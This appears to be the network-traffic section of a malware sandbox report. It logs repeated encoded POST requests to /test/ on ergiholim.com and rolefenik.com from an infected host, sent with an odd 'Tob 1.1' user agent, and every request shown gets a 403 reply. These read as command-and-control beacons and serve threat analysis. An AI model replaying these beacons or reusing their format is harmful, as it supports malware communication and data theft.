                                                                                                                                          2024-11-13 17:22:57 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:22:57 UTC747INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:57 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F6pYaYF214rnQtg64g8L6p6AL9LspkjxnVvl%2FId2AYBLSJKWi1rxSX2LydKU2wcH%2FAmVntqpdHvWcQlbcycetsatnHuovII783CcJR6KbhyFFEHacZ%2BzitzPNyBDLVMC"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2072636a6bc979-IAD
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=33447&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=86626&cwnd=32&unsent_bytes=0&cid=da1362e8537745c5&ts=286&x=0"
                                                                                                                                          2024-11-13 17:22:57 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:22:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          54192.168.2.650047104.21.15.162443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:22:58 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:22:58 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:22:59 UTC748INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:59 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XGHHpDIDBXY2ts8C6KRtMUd%2FdgBdVjj%2BDKak8YTJ1m77jf7JQm82kt0wP7Rftyn6Ymu0toZMQo6YMFKYs6Ux2Z3i90PCwHVCdmYMT8W89Wp6UHAmfpPE6nCTCN4dJe57"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e20726efa546b06-DFW
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1313&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=2360228&cwnd=236&unsent_bytes=0&cid=6e26bb5a99c475d5&ts=1426&x=0"
                                                                                                                                          2024-11-13 17:22:59 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:22:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          55192.168.2.650048104.21.92.105443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:23:00 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:23:00 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:23:00 UTC748INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:00 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=53FK1MbVdP2exh9R30Zbk6wUIj0r9cdGiJEouY9XFL5YFoYuayPQEQL0%2FLNzqWzw72Zgu5iDF%2FzsHbFIk04nzdwXPVMZ%2BOFncGxuZnHtrCrDQRcNzUeFnZJz3fHaFz8n"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2072779d65d744-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=130818&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1167&delivery_rate=22142&cwnd=32&unsent_bytes=0&cid=56f90b16cfacd2ba&ts=505&x=0"
                                                                                                                                          2024-11-13 17:23:00 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:23:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          56192.168.2.650049104.21.15.162443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:23:01 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:23:01 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:23:02 UTC747INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:02 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sDwovdz1JJdMtieF51S4hW2OaKNbVPuLAZv1W8B6JSTPqDI9%2FrSNtPu2IaPoEqdX5ERzePuHxLiLxr1pv%2Fee9N%2BTFjwRZruV2KzxaDDkoYuYsaD39Mtsh9WOVOUebuY9"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e207281082f230e-SJC
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=41539&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1167&delivery_rate=69692&cwnd=32&unsent_bytes=0&cid=4f6311489d8c8a45&ts=649&x=0"
                                                                                                                                          2024-11-13 17:23:02 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:23:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          57192.168.2.650050104.21.92.105443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:23:03 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:23:03 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:23:03 UTC742INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:03 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8tFLPmqI799PnVeBOrq5G5ZXAMN6sjSzNTOcBhKuiHacpHIge4bmsDB7A6gBXEQ9I5TCD6VzQUzpKjQ23r2YwtumxUU5xw99TerBLalDxEsW1QvmHoUGFJQieEjbSOd7"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e20728b5edfd773-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=137262&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=21077&cwnd=32&unsent_bytes=0&cid=0dc08ebf919023c0&ts=507&x=0"
                                                                                                                                          2024-11-13 17:23:03 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:23:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          58192.168.2.650051104.21.15.162443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:23:04 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:23:04 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:23:05 UTC747INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:05 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0nSy34c9HeRGYq1rso4OjG3DbafnyF3HcR4LJzS6%2B8EkflOWT1vQ2dPE1xON9f30KM0IzfEgx%2FN9sDiVeDEdii1NoYMzM3f0a%2Fw1toPlx9AVinICfYUm9EmcwwQkXE36"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2072932fe9c991-IAD
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=33698&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1167&delivery_rate=85843&cwnd=32&unsent_bytes=0&cid=242a4841e244cbd9&ts=379&x=0"
                                                                                                                                          2024-11-13 17:23:05 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:23:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          59192.168.2.650053104.21.92.105443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:23:06 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:23:06 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:23:06 UTC748INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:06 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ugTmQJwoSTRLngQursOqTYXHNAD%2FbK3wnmoQwVwbfcW4W%2BQ9B0WoxujjHmJ4eg5tRu0HHaxBaXQ5u7oAS7veuAeSl%2BzgSREM22vjTQkjj5VHRnWm1ZplJXGUeZDLeg24"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e20729d987ad754-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=142391&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=18051&cwnd=32&unsent_bytes=0&cid=353bf2596d3dc2ed&ts=868&x=0"
